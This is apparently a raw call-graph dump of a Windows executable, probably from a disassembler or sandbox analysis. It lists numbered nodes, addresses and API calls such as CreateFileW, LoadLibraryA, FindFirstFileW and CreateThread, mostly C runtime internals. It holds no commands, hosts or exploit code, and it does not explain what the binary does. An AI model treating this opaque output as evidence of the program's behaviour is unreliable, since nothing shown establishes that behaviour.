_W_store_winword 93752->93819 93755 2ae5cc __getstream 93755->93738 93756 2ae560 93757 2ae56f InitializeCriticalSectionAndSpinCount EnterCriticalSection 93756->93757 93761 2ae552 93756->93761 93757->93761 93760 2ae4e2 93760->93752 93760->93761 93793 2a7d7c 93760->93793 93817 2a4e5b 48 API calls __lock 93760->93817 93818 2a4ec5 LeaveCriticalSection LeaveCriticalSection _doexit 93760->93818 93790 2ae5d7 93761->93790 93771 2ae600 __wopenfile 93763->93771 93764 2ae61a 93838 2a7c0e 47 API calls __getptd_noexit 93764->93838 93766 2ae61f 93839 2a6e10 8 API calls __cftoe2_l 
93766->93839 93768 2a354e 93782 2a3570 LeaveCriticalSection LeaveCriticalSection _fseek 93768->93782 93769 2ae838 93835 2b63c9 93769->93835 93771->93764 93771->93771 93777 2ae7d5 93771->93777 93840 2a185b 59 API calls 3 library calls 93771->93840 93773 2ae7ce 93773->93777 93841 2a185b 59 API calls 3 library calls 93773->93841 93775 2ae7ed 93775->93777 93842 2a185b 59 API calls 3 library calls 93775->93842 93777->93764 93777->93769 93778->93735 93779->93745 93780->93745 93781->93745 93782->93745 93784 2a7d18 EnterCriticalSection 93783->93784 93785 2a7d05 93783->93785 93784->93760 93786 2a7d7c __mtinitlocknum 46 API calls 93785->93786 93787 2a7d0b 93786->93787 93787->93784 93820 2a115b 47 API calls 3 library calls 93787->93820 93821 2a7e58 LeaveCriticalSection 93790->93821 93792 2ae5de 93792->93755 93794 2a7d88 __getstream 93793->93794 93795 2a7da9 93794->93795 93796 2a7d91 93794->93796 93798 2a7da7 93795->93798 93804 2a7e11 __getstream 93795->93804 93822 2a81c2 47 API calls __NMSG_WRITE 93796->93822 93798->93795 93825 2a69d0 47 API calls _W_store_winword 93798->93825 93799 2a7d96 93823 2a821f 47 API calls 5 library calls 93799->93823 93802 2a7dbd 93805 2a7dd3 93802->93805 93806 2a7dc4 93802->93806 93803 2a7d9d 93824 2a1145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 93803->93824 93804->93760 93808 2a7cf4 __lock 46 API calls 93805->93808 93826 2a7c0e 47 API calls __getptd_noexit 93806->93826 93811 2a7dda 93808->93811 93810 2a7dc9 93810->93804 93812 2a7de9 InitializeCriticalSectionAndSpinCount 93811->93812 93813 2a7dfe 93811->93813 93814 2a7e04 93812->93814 93827 2a1c9d 93813->93827 93833 2a7e1a LeaveCriticalSection _doexit 93814->93833 93817->93760 93818->93760 93819->93756 93821->93792 93822->93799 93823->93803 93825->93802 93826->93810 93828 2a1ccf _free 93827->93828 93829 2a1ca6 RtlFreeHeap 93827->93829 93828->93814 93829->93828 93830 2a1cbb 93829->93830 93834 2a7c0e 47 API calls __getptd_noexit 93830->93834 93832 2a1cc1 GetLastError 
93832->93828 93833->93804 93834->93832 93843 2b5bb1 93835->93843 93837 2b63e2 93837->93768 93838->93766 93839->93768 93840->93773 93841->93775 93842->93777 93844 2b5bbd __getstream 93843->93844 93845 2b5bcf 93844->93845 93848 2b5c06 93844->93848 93930 2a7c0e 47 API calls __getptd_noexit 93845->93930 93847 2b5bd4 93931 2a6e10 8 API calls __cftoe2_l 93847->93931 93854 2b5c78 93848->93854 93851 2b5c23 93932 2b5c4c LeaveCriticalSection __unlock_fhandle 93851->93932 93853 2b5bde __getstream 93853->93837 93855 2b5c98 93854->93855 93856 2a273b __wsopen_helper 47 API calls 93855->93856 93859 2b5cb4 93856->93859 93857 2b5deb 93858 2a6e20 __invoke_watson 8 API calls 93857->93858 93860 2b63c8 93858->93860 93859->93857 93861 2b5cee 93859->93861 93869 2b5d11 93859->93869 93862 2b5bb1 __wsopen_helper 104 API calls 93860->93862 93863 2a7bda __chsize_nolock 47 API calls 93861->93863 93864 2b63e2 93862->93864 93865 2b5cf3 93863->93865 93864->93851 93866 2a7c0e __recalloc 47 API calls 93865->93866 93867 2b5d00 93866->93867 93870 2a6e10 __cftoe2_l 8 API calls 93867->93870 93868 2b5dcf 93871 2a7bda __chsize_nolock 47 API calls 93868->93871 93869->93868 93877 2b5dad 93869->93877 93872 2b5d0a 93870->93872 93873 2b5dd4 93871->93873 93872->93851 93874 2a7c0e __recalloc 47 API calls 93873->93874 93875 2b5de1 93874->93875 93876 2a6e10 __cftoe2_l 8 API calls 93875->93876 93876->93857 93878 2aa979 __wsopen_helper 52 API calls 93877->93878 93879 2b5e7b 93878->93879 93880 2b5ea6 93879->93880 93881 2b5e85 93879->93881 93883 2b5b20 ___createFile GetModuleHandleW GetProcAddress CreateFileW 93880->93883 93882 2a7bda __chsize_nolock 47 API calls 93881->93882 93884 2b5e8a 93882->93884 93894 2b5ec8 93883->93894 93885 2a7c0e __recalloc 47 API calls 93884->93885 93887 2b5e94 93885->93887 93886 2b5f46 GetFileType 93888 2b5f93 93886->93888 93889 2b5f51 GetLastError 93886->93889 93892 2a7c0e __recalloc 47 API calls 93887->93892 93899 2aac0b __set_osfhnd 48 API calls 93888->93899 93893 2a7bed __dosmaperr 47 
API calls 93889->93893 93890 2b5f14 GetLastError 93891 2a7bed __dosmaperr 47 API calls 93890->93891 93896 2b5f39 93891->93896 93892->93872 93897 2b5f78 CloseHandle 93893->93897 93894->93886 93894->93890 93895 2b5b20 ___createFile GetModuleHandleW GetProcAddress CreateFileW 93894->93895 93898 2b5f09 93895->93898 93901 2a7c0e __recalloc 47 API calls 93896->93901 93897->93896 93900 2b5f86 93897->93900 93898->93886 93898->93890 93904 2b5fb1 93899->93904 93902 2a7c0e __recalloc 47 API calls 93900->93902 93901->93857 93903 2b5f8b 93902->93903 93903->93896 93905 2b616c 93904->93905 93906 2af82f __lseeki64_nolock 49 API calls 93904->93906 93920 2b6032 93904->93920 93905->93857 93907 2b633f CloseHandle 93905->93907 93908 2b601b 93906->93908 93909 2b5b20 ___createFile GetModuleHandleW GetProcAddress CreateFileW 93907->93909 93912 2a7bda __chsize_nolock 47 API calls 93908->93912 93926 2b603a 93908->93926 93911 2b6366 93909->93911 93910 2aee0e 59 API calls __filbuf 93910->93926 93913 2b636e GetLastError 93911->93913 93929 2b61f6 93911->93929 93912->93920 93914 2a7bed __dosmaperr 47 API calls 93913->93914 93915 2b637a 93914->93915 93918 2aab1e __free_osfhnd 48 API calls 93915->93918 93916 2aea9c __close_nolock 50 API calls 93916->93926 93917 2b6f40 __chsize_nolock 81 API calls 93917->93926 93918->93929 93919 2aaf61 __flush 78 API calls 93919->93920 93920->93905 93920->93919 93923 2af82f 49 API calls __lseeki64_nolock 93920->93923 93920->93926 93921 2b61e9 93924 2aea9c __close_nolock 50 API calls 93921->93924 93922 2b61d2 93922->93905 93923->93920 93925 2b61f0 93924->93925 93928 2a7c0e __recalloc 47 API calls 93925->93928 93926->93910 93926->93916 93926->93917 93926->93920 93926->93921 93926->93922 93927 2af82f 49 API calls __lseeki64_nolock 93926->93927 93927->93926 93928->93929 93929->93857 93930->93847 93931->93853 93932->93853 93937 2842f6 93933->93937 93936 2842cc LoadLibraryA GetProcAddress 93936->93691 93938 2842aa 93937->93938 93939 2842ff LoadLibraryA 93937->93939 
93938->93691 93938->93936 93939->93938 93940 284310 GetProcAddress 93939->93940 93940->93938 93942 29f4ea 48 API calls 93941->93942 93943 2847c9 93942->93943 93943->93696 93945 284085 FindResourceExW 93944->93945 93947 2840a2 93944->93947 93946 2f4f16 LoadResource 93945->93946 93945->93947 93946->93947 93948 2f4f2b SizeofResource 93946->93948 93947->93697 93948->93947 93949 2f4f3f LockResource 93948->93949 93949->93947 93951 284526 93950->93951 93952 2f4fe0 93950->93952 93956 2a3a8d 93951->93956 93954 284534 93954->93704 93955->93697 93957 2a3a99 __getstream 93956->93957 93958 2a3aa7 93957->93958 93960 2a3acd 93957->93960 93969 2a7c0e 47 API calls __getptd_noexit 93958->93969 93971 2a4e1c 93960->93971 93961 2a3aac 93970 2a6e10 8 API calls __cftoe2_l 93961->93970 93966 2a3ae2 93978 2a3b04 LeaveCriticalSection LeaveCriticalSection _fseek 93966->93978 93968 2a3ab7 __getstream 93968->93954 93969->93961 93970->93968 93972 2a4e4e EnterCriticalSection 93971->93972 93973 2a4e2c 93971->93973 93976 2a3ad3 93972->93976 93973->93972 93974 2a4e34 93973->93974 93975 2a7cf4 __lock 47 API calls 93974->93975 93975->93976 93977 2a39fe 81 API calls 4 library calls 93976->93977 93977->93966 93978->93968 93982 2a3839 93979->93982 93981 284510 93981->93716 93983 2a3845 __getstream 93982->93983 93984 2a385b _memset 93983->93984 93985 2a3888 93983->93985 93986 2a3880 __getstream 93983->93986 93995 2a7c0e 47 API calls __getptd_noexit 93984->93995 93987 2a4e1c __lock_file 48 API calls 93985->93987 93986->93981 93988 2a388e 93987->93988 93997 2a365b 62 API calls 6 library calls 93988->93997 93991 2a3875 93996 2a6e10 8 API calls __cftoe2_l 93991->93996 93992 2a38a4 93998 2a38c2 LeaveCriticalSection LeaveCriticalSection _fseek 93992->93998 93995->93991 93996->93986 93997->93992 93998->93986 94000 2a3e71 __getstream 93999->94000 94001 2a3e7f 94000->94001 94002 2a3e94 94000->94002 94013 2a7c0e 47 API calls __getptd_noexit 94001->94013 94004 2a4e1c __lock_file 48 API calls 94002->94004 94006 
2a3e9a 94004->94006 94005 2a3e84 94014 2a6e10 8 API calls __cftoe2_l 94005->94014 94015 2a3b0c 55 API calls 5 library calls 94006->94015 94009 2a3ea5 94016 2a3ec5 LeaveCriticalSection LeaveCriticalSection _fseek 94009->94016 94011 2a3eb7 94012 2a3e8f __getstream 94011->94012 94012->93721 94013->94005 94014->94012 94015->94009 94016->94011 94018 2a1e61 94017->94018 94021 2a1e55 94017->94021 94041 2a7c0e 47 API calls __getptd_noexit 94018->94041 94020 2a2019 94025 2a1e41 94020->94025 94042 2a6e10 8 API calls __cftoe2_l 94020->94042 94021->94018 94027 2a1ed4 94021->94027 94036 2a9d6b 47 API calls 2 library calls 94021->94036 94024 2a1fa0 94024->94018 94024->94025 94028 2a1fb0 94024->94028 94025->93551 94026 2a1f5f 94026->94018 94029 2a1f7b 94026->94029 94038 2a9d6b 47 API calls 2 library calls 94026->94038 94027->94018 94035 2a1f41 94027->94035 94037 2a9d6b 47 API calls 2 library calls 94027->94037 94040 2a9d6b 47 API calls 2 library calls 94028->94040 94029->94018 94029->94025 94031 2a1f91 94029->94031 94039 2a9d6b 47 API calls 2 library calls 94031->94039 94035->94024 94035->94026 94036->94027 94037->94035 94038->94029 94039->94025 94040->94025 94041->94020 94042->94025 94079 2a344a GetSystemTimeAsFileTime 94043->94079 94045 2cbdc3 94045->93629 94046->93659 94048 2a2aba __getstream 94047->94048 94049 2a2aec 94048->94049 94050 2a2ad4 94048->94050 94051 2a2ae4 __getstream 94048->94051 94052 2a4e1c __lock_file 48 API calls 94049->94052 94093 2a7c0e 47 API calls __getptd_noexit 94050->94093 94051->93667 94054 2a2af2 94052->94054 94081 2a2957 94054->94081 94055 2a2ad9 94094 2a6e10 8 API calls __cftoe2_l 94055->94094 94061 2a35f0 __getstream 94060->94061 94062 2a361c 94061->94062 94063 2a3604 94061->94063 94065 2a4e1c __lock_file 48 API calls 94062->94065 94068 2a3614 __getstream 94062->94068 94271 2a7c0e 47 API calls __getptd_noexit 94063->94271 94069 2a362e 94065->94069 94066 2a3609 94272 2a6e10 8 API calls __cftoe2_l 94066->94272 94068->93663 94255 2a3578 94069->94255 
94074 2cc6ff SetFileTime CloseHandle 94073->94074 94075 2cc715 94073->94075 94074->94075 94075->93640 94076->93636 94077->93650 94078->93666 94080 2a3478 __aulldiv 94079->94080 94080->94045 94083 2a2966 94081->94083 94088 2a2984 94081->94088 94082 2a2974 94128 2a7c0e 47 API calls __getptd_noexit 94082->94128 94083->94082 94083->94088 94091 2a299c ___crtGetEnvironmentStringsW 94083->94091 94085 2a2979 94129 2a6e10 8 API calls __cftoe2_l 94085->94129 94095 2a2b24 LeaveCriticalSection LeaveCriticalSection _fseek 94088->94095 94091->94088 94096 2a2933 94091->94096 94103 2aaf61 94091->94103 94130 2a2c84 94091->94130 94136 2a8e63 78 API calls 5 library calls 94091->94136 94093->94055 94094->94051 94095->94051 94097 2a293d 94096->94097 94098 2a2952 94096->94098 94137 2a7c0e 47 API calls __getptd_noexit 94097->94137 94098->94091 94100 2a2942 94138 2a6e10 8 API calls __cftoe2_l 94100->94138 94102 2a294d 94102->94091 94104 2aaf6d __getstream 94103->94104 94105 2aaf8d 94104->94105 94106 2aaf75 94104->94106 94107 2ab022 94105->94107 94113 2aafbf 94105->94113 94212 2a7bda 47 API calls __getptd_noexit 94106->94212 94217 2a7bda 47 API calls __getptd_noexit 94107->94217 94110 2aaf7a 94213 2a7c0e 47 API calls __getptd_noexit 94110->94213 94112 2ab027 94218 2a7c0e 47 API calls __getptd_noexit 94112->94218 94139 2aa8ed 94113->94139 94114 2aaf82 __getstream 94114->94091 94117 2ab02f 94219 2a6e10 8 API calls __cftoe2_l 94117->94219 94118 2aafc5 94120 2aafeb 94118->94120 94121 2aafd8 94118->94121 94214 2a7c0e 47 API calls __getptd_noexit 94120->94214 94148 2ab043 94121->94148 94124 2aafe4 94216 2ab01a LeaveCriticalSection __unlock_fhandle 94124->94216 94125 2aaff0 94215 2a7bda 47 API calls __getptd_noexit 94125->94215 94128->94085 94129->94088 94131 2a2c97 94130->94131 94132 2a2cbb 94130->94132 94131->94132 94133 2a2933 __stbuf 47 API calls 94131->94133 94132->94091 94134 2a2cb4 94133->94134 94135 2aaf61 __flush 78 API calls 94134->94135 94135->94132 94136->94091 94137->94100 
94138->94102 94140 2aa8f9 __getstream 94139->94140 94141 2aa946 EnterCriticalSection 94140->94141 94143 2a7cf4 __lock 47 API calls 94140->94143 94142 2aa96c __getstream 94141->94142 94142->94118 94144 2aa91d 94143->94144 94145 2aa93a 94144->94145 94146 2aa928 InitializeCriticalSectionAndSpinCount 94144->94146 94220 2aa970 LeaveCriticalSection _doexit 94145->94220 94146->94145 94149 2ab050 __ftell_nolock 94148->94149 94150 2ab0ac 94149->94150 94151 2ab08d 94149->94151 94180 2ab082 94149->94180 94154 2ab105 94150->94154 94155 2ab0e9 94150->94155 94230 2a7bda 47 API calls __getptd_noexit 94151->94230 94159 2ab11c 94154->94159 94236 2af82f 49 API calls 3 library calls 94154->94236 94233 2a7bda 47 API calls __getptd_noexit 94155->94233 94156 2ab86b 94156->94124 94157 2ab092 94231 2a7c0e 47 API calls __getptd_noexit 94157->94231 94221 2b3bf2 94159->94221 94161 2ab0ee 94234 2a7c0e 47 API calls __getptd_noexit 94161->94234 94163 2ab099 94232 2a6e10 8 API calls __cftoe2_l 94163->94232 94169 2ab0f5 94244 2aa70c 94180->94244 94212->94110 94213->94114 94214->94125 94215->94124 94216->94114 94217->94112 94218->94117 94219->94114 94220->94141 94222 2b3bfd 94221->94222 94224 2b3c0a 94221->94224 94226 2b3c16 94224->94226 94252 2a7c0e 47 API calls __getptd_noexit 94224->94252 94230->94157 94231->94163 94232->94180 94233->94161 94234->94169 94236->94159 94245 2aa716 IsProcessorFeaturePresent 94244->94245 94246 2aa714 94244->94246 94248 2b37b0 94245->94248 94246->94156 94254 2b375f 5 API calls 2 library calls 94248->94254 94250 2b3893 94250->94156 94254->94250 94256 2a359b 94255->94256 94257 2a3587 94255->94257 94259 2a3597 94256->94259 94261 2a2c84 __flush 78 API calls 94256->94261 94301 2a7c0e 47 API calls __getptd_noexit 94257->94301 94273 2a3653 LeaveCriticalSection LeaveCriticalSection _fseek 94259->94273 94260 2a358c 94302 2a6e10 8 API calls __cftoe2_l 94260->94302 94263 2a35a7 94261->94263 94274 2aeb36 94263->94274 94266 2a2933 __stbuf 47 API calls 94267 2a35b5 94266->94267 
94278 2ae9d2 94267->94278 94269 2a35bb 94269->94259 94270 2a1c9d _free 47 API calls 94269->94270 94270->94259 94271->94066 94272->94068 94273->94068 94275 2a35af 94274->94275 94276 2aeb43 94274->94276 94275->94266 94276->94275 94277 2a1c9d _free 47 API calls 94276->94277 94277->94275 94279 2ae9de __getstream 94278->94279 94280 2ae9fe 94279->94280 94281 2ae9e6 94279->94281 94282 2aea7b 94280->94282 94288 2aea28 94280->94288 94318 2a7bda 47 API calls __getptd_noexit 94281->94318 94322 2a7bda 47 API calls __getptd_noexit 94282->94322 94285 2ae9eb 94319 2a7c0e 47 API calls __getptd_noexit 94285->94319 94287 2aea80 94323 2a7c0e 47 API calls __getptd_noexit 94287->94323 94290 2aa8ed ___lock_fhandle 49 API calls 94288->94290 94292 2aea2e 94290->94292 94291 2aea88 94324 2a6e10 8 API calls __cftoe2_l 94291->94324 94294 2aea4c 94292->94294 94295 2aea41 94292->94295 94320 2a7c0e 47 API calls __getptd_noexit 94294->94320 94303 2aea9c 94295->94303 94296 2ae9f3 __getstream 94296->94269 94299 2aea47 94321 2aea73 LeaveCriticalSection __unlock_fhandle 94299->94321 94301->94260 94302->94259 94325 2aaba4 94303->94325 94307 2aeaaa 94318->94285 94319->94296 94320->94299 94321->94296 94322->94287 94323->94291 94324->94296 94326 2aabaf 94325->94326 94327 2aabc4 94325->94327 94340 2a7bda 47 API calls __getptd_noexit 94326->94340 94331 2aabe9 94327->94331 94342 2a7bda 47 API calls __getptd_noexit 94327->94342 94330 2aabb4 94331->94307 94332 2aabf3 94340->94330 94342->94332 94374 286b0f 94345->94374 94347 28b69b 94381 28ba85 94347->94381 94349 28b6b5 Mailbox 94349->93579 94352 2f3939 ___crtGetEnvironmentStringsW 94391 2c26bc 88 API calls 4 library calls 94352->94391 94353 2f397b 94392 2c26bc 88 API calls 4 library calls 94353->94392 94354 28ba85 48 API calls 94365 28b495 94354->94365 94357 28b9e4 94393 2c26bc 88 API calls 4 library calls 94357->94393 94358 2f3973 94358->94349 94361 28bcce 48 API calls 94361->94365 94362 2f3989 94363 28ba85 48 API calls 94362->94363 94363->94358 94364 2f3909 
94367 286b4a 48 API calls 94364->94367 94365->94347 94365->94352 94365->94353 94365->94354 94365->94357 94365->94361 94365->94364 94366 28bb85 48 API calls 94365->94366 94370 28bdfa 48 API calls 94365->94370 94379 28c413 59 API calls 94365->94379 94380 28bc74 48 API calls 94365->94380 94389 28c6a5 49 API calls 94365->94389 94390 28c799 48 API calls ___crtGetEnvironmentStringsW 94365->94390 94366->94365 94369 2f3914 94367->94369 94372 29f4ea 48 API calls 94369->94372 94371 28b66c CharUpperBuffW 94370->94371 94371->94365 94372->94352 94373->93583 94375 29f4ea 48 API calls 94374->94375 94376 286b34 94375->94376 94377 286b4a 48 API calls 94376->94377 94378 286b43 94377->94378 94378->94365 94379->94365 94380->94365 94382 28bb25 94381->94382 94385 28ba98 ___crtGetEnvironmentStringsW 94381->94385 94384 29f4ea 48 API calls 94382->94384 94383 29f4ea 48 API calls 94386 28ba9f 94383->94386 94384->94385 94385->94383 94387 29f4ea 48 API calls 94386->94387 94388 28bac8 94386->94388 94387->94388 94388->94349 94389->94365 94390->94365 94391->94358 94392->94362 94393->94358 94395 2c6529 94394->94395 94396 2c6cc4 FindFirstFileW 94394->94396 94395->93443 94396->94395 94397 2c6cd9 FindClose 94396->94397 94397->94395 94399 28bd3f 94398->94399 94402 28bd5a 94398->94402 94400 28bdfa 48 API calls 94399->94400 94401 28bd47 CharUpperBuffW 94400->94401 94401->94402 94402->93455 94404 282b8b 94403->94404 94405 2f436a 94403->94405 94406 29f4ea 48 API calls 94404->94406 94407 282b92 94406->94407 94408 282bb3 94407->94408 94499 282bce 48 API calls 94407->94499 94408->93474 94411 28e8f6 94410->94411 94470 28e902 Mailbox 94410->94470 94412 28ed52 94411->94412 94411->94470 94581 29e3cd 331 API calls 94412->94581 94414 28ebc7 94415 28ebdd 94414->94415 94582 282ff6 16 API calls 94414->94582 94415->93500 94417 28ed63 94417->94415 94419 28ed70 94417->94419 94418 28e94c PeekMessageW 94418->94470 94583 29e312 331 API calls Mailbox 94419->94583 94420 2f526e Sleep 94420->94470 94422 28ed77 LockWindowUpdate 
DestroyWindow GetMessageW 94422->94415 94425 28eda9 94422->94425 94426 2f59ef TranslateMessage DispatchMessageW GetMessageW 94425->94426 94426->94426 94427 2f5a1f 94426->94427 94427->94415 94428 28ebf7 timeGetTime 94428->94470 94429 28ed21 PeekMessageW 94429->94470 94430 286eed 48 API calls 94430->94470 94432 29f4ea 48 API calls 94432->94470 94433 2f5557 WaitForSingleObject 94437 2f5574 GetExitCodeProcess CloseHandle 94433->94437 94433->94470 94434 2f588f Sleep 94465 2f5429 Mailbox 94434->94465 94435 28ed3a TranslateMessage DispatchMessageW 94435->94429 94436 28d7f7 48 API calls 94436->94465 94437->94470 94438 28edae timeGetTime 94584 281caa 49 API calls 94438->94584 94440 2f5733 Sleep 94440->94465 94442 29dc38 timeGetTime 94442->94465 94444 282aae 307 API calls 94444->94470 94446 2f5926 GetExitCodeProcess 94448 2f593c WaitForSingleObject 94446->94448 94449 2f5952 CloseHandle 94446->94449 94447 2f5445 Sleep 94447->94470 94448->94449 94448->94470 94449->94465 94450 2f5432 Sleep 94450->94447 94451 2e8c4b 108 API calls 94451->94465 94452 282c79 107 API calls 94452->94465 94454 2f59ae Sleep 94454->94470 94455 281caa 49 API calls 94455->94470 94458 28ce19 48 API calls 94458->94465 94460 28d6e9 55 API calls 94460->94465 94461 28fe30 307 API calls 94461->94470 94463 2945e0 307 API calls 94463->94470 94464 293200 307 API calls 94464->94470 94465->94436 94465->94442 94465->94446 94465->94447 94465->94450 94465->94451 94465->94452 94465->94454 94465->94458 94465->94460 94465->94470 94586 2c4cbe 49 API calls Mailbox 94465->94586 94587 281caa 49 API calls 94465->94587 94588 282aae 331 API calls 94465->94588 94589 2dccb2 50 API calls 94465->94589 94590 2c7a58 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 94465->94590 94591 2c6532 63 API calls 3 library calls 94465->94591 94467 2ccc5c 86 API calls 94467->94470 94468 28ce19 48 API calls 94468->94470 94469 28d6e9 55 API calls 94469->94470 94470->94414 94470->94418 94470->94420 94470->94428 
94470->94429 94470->94430 94470->94432 94470->94433 94470->94434 94470->94435 94470->94438 94470->94440 94470->94444 94470->94447 94470->94455 94470->94461 94470->94463 94470->94464 94470->94465 94470->94467 94470->94468 94470->94469 94500 28ef00 94470->94500 94505 28f110 94470->94505 94570 29e244 94470->94570 94575 29dc5f 94470->94575 94580 28eed0 331 API calls Mailbox 94470->94580 94585 2e8d23 48 API calls 94470->94585 94471->93463 94472->93521 94473->93500 94474->93500 94475->93500 94476->93524 94477->93463 94478->93521 94479->93507 94480->93507 94481->93511 94482->93521 94483->93487 94484->93521 94485->93521 94486->93521 94487->93500 94488->93500 94489->93500 94490->93500 94492 28d6f4 94491->94492 94494 28d71b 94492->94494 94614 28d764 55 API calls 94492->94614 94494->93486 94495->93521 94496->93495 94497->93461 94498->93521 94499->94408 94501 28ef1d 94500->94501 94502 28ef2f 94500->94502 94501->94470 94592 2ccc5c 86 API calls 4 library calls 94502->94592 94504 2f86f9 94504->94504 94506 28f130 94505->94506 94509 28fe30 331 API calls 94506->94509 94511 28f199 94506->94511 94507 28f3dd 94510 2f87c8 94507->94510 94521 28f3f2 94507->94521 94554 28f431 Mailbox 94507->94554 94508 28f595 94516 28d7f7 48 API calls 94508->94516 94508->94554 94512 2f8728 94509->94512 94597 2ccc5c 86 API calls 4 library calls 94510->94597 94511->94507 94511->94508 94517 28d7f7 48 API calls 94511->94517 94555 28f229 94511->94555 94512->94511 94594 2ccc5c 86 API calls 4 library calls 94512->94594 94514 28fe30 331 API calls 94514->94554 94518 2f87a3 94516->94518 94519 2f8772 94517->94519 94596 2a0f0a 52 API calls __cinit 94518->94596 94595 2a0f0a 52 API calls __cinit 94519->94595 94546 28f418 94521->94546 94598 2c9af1 48 API calls 94521->94598 94522 2f8b1b 94536 2f8bcf 94522->94536 94537 2f8b2c 94522->94537 94523 28f770 94529 2f8a45 94523->94529 94547 28f77a 94523->94547 94525 28d6e9 55 API calls 94525->94554 94527 2f8c53 94612 2ccc5c 86 API calls 4 library calls 94527->94612 94528 2f8810 
94599 2deef8 331 API calls 94528->94599 94604 29c1af 48 API calls 94529->94604 94530 28fe30 331 API calls 94548 28f6aa 94530->94548 94531 2f8b7e 94607 2de40a 331 API calls Mailbox 94531->94607 94609 2ccc5c 86 API calls 4 library calls 94536->94609 94606 2df5ee 331 API calls 94537->94606 94538 2f8beb 94610 2dbdbd 331 API calls Mailbox 94538->94610 94542 291b90 48 API calls 94542->94554 94543 291b90 48 API calls 94543->94554 94545 2f8c00 94569 28f537 Mailbox 94545->94569 94611 2ccc5c 86 API calls 4 library calls 94545->94611 94546->94522 94546->94548 94546->94554 94547->94543 94548->94523 94548->94530 94551 28fce0 94548->94551 94548->94554 94548->94569 94550 2f8823 94550->94546 94553 2f884b 94550->94553 94551->94569 94608 2ccc5c 86 API calls 4 library calls 94551->94608 94552 2ccc5c 86 API calls 94552->94554 94600 2dccdc 48 API calls 94553->94600 94554->94514 94554->94525 94554->94527 94554->94531 94554->94538 94554->94542 94554->94551 94554->94552 94554->94569 94593 28dd47 48 API calls ___crtGetEnvironmentStringsW 94554->94593 94605 2b97ed InterlockedDecrement 94554->94605 94613 29c1af 48 API calls 94554->94613 94555->94507 94555->94508 94555->94546 94555->94554 94559 2f8857 94561 2f8865 94559->94561 94562 2f88aa 94559->94562 94601 2c9b72 48 API calls 94561->94601 94565 2f88a0 Mailbox 94562->94565 94602 2ca69d 48 API calls 94562->94602 94563 28fe30 331 API calls 94563->94569 94565->94563 94567 2f88e7 94603 28bc74 48 API calls 94567->94603 94569->94470 94571 29e253 94570->94571 94572 2fdf42 94570->94572 94571->94470 94573 2fdf77 94572->94573 94574 2fdf59 TranslateAcceleratorW 94572->94574 94574->94571 94576 29dca3 94575->94576 94577 29dc71 94575->94577 94576->94470 94577->94576 94578 29dc96 IsDialogMessageW 94577->94578 94579 2fdd1d GetClassLongW 94577->94579 94578->94576 94578->94577 94579->94577 94579->94578 94580->94470 94581->94414 94582->94417 94583->94422 94584->94470 94585->94470 94586->94465 94587->94465 94588->94465 94589->94465 94590->94465 94591->94465 
94592->94504 94593->94554 94594->94511 94595->94555 94596->94554 94597->94569 94598->94528 94599->94550 94600->94559 94601->94565 94602->94567 94603->94565 94604->94554 94605->94554 94606->94554 94607->94551 94608->94569 94609->94569 94610->94545 94611->94569 94612->94569 94613->94554 94614->94494 94615->93135 94616 2f19cb 94621 282322 94616->94621 94618 2f19d1 94654 2a0f0a 52 API calls __cinit 94618->94654 94620 2f19db 94622 282344 94621->94622 94655 2826df 94622->94655 94627 28d7f7 48 API calls 94628 282384 94627->94628 94629 28d7f7 48 API calls 94628->94629 94630 28238e 94629->94630 94631 28d7f7 48 API calls 94630->94631 94632 282398 94631->94632 94633 28d7f7 48 API calls 94632->94633 94634 2823de 94633->94634 94635 28d7f7 48 API calls 94634->94635 94636 2824c1 94635->94636 94663 28263f 94636->94663 94640 2824f1 94641 28d7f7 48 API calls 94640->94641 94642 2824fb 94641->94642 94692 282745 94642->94692 94644 282546 94645 282556 GetStdHandle 94644->94645 94646 2f501d 94645->94646 94647 2825b1 94645->94647 94646->94647 94649 2f5026 94646->94649 94648 2825b7 CoInitialize 94647->94648 94648->94618 94699 2c92d4 53 API calls 94649->94699 94651 2f502d 94700 2c99f9 CreateThread 94651->94700 94653 2f5039 CloseHandle 94653->94648 94654->94620 94701 282854 94655->94701 94659 28234a 94660 28272e 94659->94660 94727 2827ec 6 API calls 94660->94727 94662 28237a 94662->94627 94664 28d7f7 48 API calls 94663->94664 94665 28264f 94664->94665 94666 28d7f7 48 API calls 94665->94666 94667 282657 94666->94667 94728 2826a7 94667->94728 94670 2826a7 48 API calls 94671 282667 94670->94671 94672 28d7f7 48 API calls 94671->94672 94673 282672 94672->94673 94674 29f4ea 48 API calls 94673->94674 94675 2824cb 94674->94675 94676 2822a4 94675->94676 94677 2822b2 94676->94677 94678 28d7f7 48 API calls 94677->94678 94679 2822bd 94678->94679 94680 28d7f7 48 API calls 94679->94680 94681 2822c8 94680->94681 94682 28d7f7 48 API calls 94681->94682 94683 2822d3 94682->94683 94684 28d7f7 48 API calls 
94683->94684 94685 2822de 94684->94685 94686 2826a7 48 API calls 94685->94686 94687 2822e9 94686->94687 94688 29f4ea 48 API calls 94687->94688 94689 2822f0 94688->94689 94690 2822f9 RegisterWindowMessageW 94689->94690 94691 2f1fe7 94689->94691 94690->94640 94693 2f5f4d 94692->94693 94694 282755 94692->94694 94733 2cc942 50 API calls 94693->94733 94696 29f4ea 48 API calls 94694->94696 94697 28275d 94696->94697 94697->94644 94698 2f5f58 94699->94651 94700->94653 94734 2c99df 54 API calls 94700->94734 94719 282870 94701->94719 94704 282870 48 API calls 94705 282864 94704->94705 94706 28d7f7 48 API calls 94705->94706 94707 282716 94706->94707 94708 286a63 94707->94708 94709 286adf 94708->94709 94712 286a6f __NMSG_WRITE 94708->94712 94710 28b18b 48 API calls 94709->94710 94711 286ab6 ___crtGetEnvironmentStringsW 94710->94711 94711->94659 94713 286a8b 94712->94713 94714 286ad7 94712->94714 94716 286b4a 48 API calls 94713->94716 94726 28c369 48 API calls 94714->94726 94717 286a95 94716->94717 94718 29ee75 48 API calls 94717->94718 94718->94711 94720 28d7f7 48 API calls 94719->94720 94721 28287b 94720->94721 94722 28d7f7 48 API calls 94721->94722 94723 282883 94722->94723 94724 28d7f7 48 API calls 94723->94724 94725 28285c 94724->94725 94725->94704 94726->94711 94727->94662 94729 28d7f7 48 API calls 94728->94729 94730 2826b0 94729->94730 94731 28d7f7 48 API calls 94730->94731 94732 28265f 94731->94732 94732->94670 94733->94698 94735 2cbb64 94736 2cbb71 94735->94736 94739 2cbb77 94735->94739 94737 2a1c9d _free 47 API calls 94736->94737 94737->94739 94738 2cbb88 94741 2cbb9a 